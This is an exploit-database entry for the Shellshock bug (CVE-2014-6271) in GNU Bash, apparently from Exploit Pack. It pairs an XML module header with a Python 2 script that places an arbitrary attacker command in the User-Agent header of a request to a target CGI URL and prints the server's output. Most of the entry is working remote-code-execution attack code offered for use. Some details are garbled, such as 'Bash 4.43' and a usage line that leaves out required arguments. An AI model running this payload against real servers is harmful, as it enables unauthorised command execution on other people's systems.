GNU Bash 4.3 Command Injection

2014-09-29T00:00:00
ID PACKETSTORM:128481
Type packetstorm
Reporter Juan Sacco
Modified 2014-09-29T00:00:00

Description

                                        
                                            `<?xml version="1.0" encoding="UTF-8"?>  
  
<Module>  
  
  
<Exploit NameXML="Bash-CMD-Injection" CodeName="BashCMDInjection.py"  
Platform="linux" Service="http" Type="remote" RemotePort="80" LocalPort=  
"4444" ShellcodeAvailable="E" ShellPort="4444" SpecialArgs="">  
  
</Exploit>  
  
  
<Information Author="Juan Sacco" Date="Dec 29 2014" Vulnerability=  
"2014-6271">  
  
GNU Bash through 4.3 processes trailing strings after function definitions  
in the values of  
  
environment variables, which allows remote attackers to execute arbitrary  
code via a crafted environment.  
  
</Information>  
  
  
<Targets>  
  
Any Bash 4.43 > and prior  
  
</Targets>  
  
  
</Module>  
  
# Modified by JSacco - jsacco@exploitpack.com  
  
# Exploit Pack 2014  
  
# How to run: checkCVE20146271.py http://www.server.com/script.cgi  
  
  
import urllib2, sys  
  
  
Target = sys.argv[1]  
  
Port = int(sys.argv[2])  
  
ShellcodeType = sys.argv[3]  
  
Extra = sys.argv[4]  
  
  
print "Check a host: checkbash.py http://www.domain.com/script.cgi"  
  
print "Info: GNU Bash through 4.3 processes trailing strings after function  
definitions in the values of environment variables, which allows remote  
attackers to execute arbitrary code via a crafted environment, as  
demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd,  
the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts  
executed by unspecified DHCP clients, and other situations in which setting  
the environment occurs across a privilege boundary from Bash execution, aka  
ShellShock."  
  
print "###########################################################"  
  
header = {'User-Agent': '() { :;}; echo Content-type:text/plain;echo;%s'  
%(Extra)}  
  
  
request = urllib2.Request(Target, '', header)  
  
if urllib2.urlopen(request).read().find("www") != -1 or  
urllib2.urlopen(request).read().find("http") != -1:  
  
print "Response from server:", urllib2.urlopen(request).read()  
  
print "Seems vulnerable:", Target  
`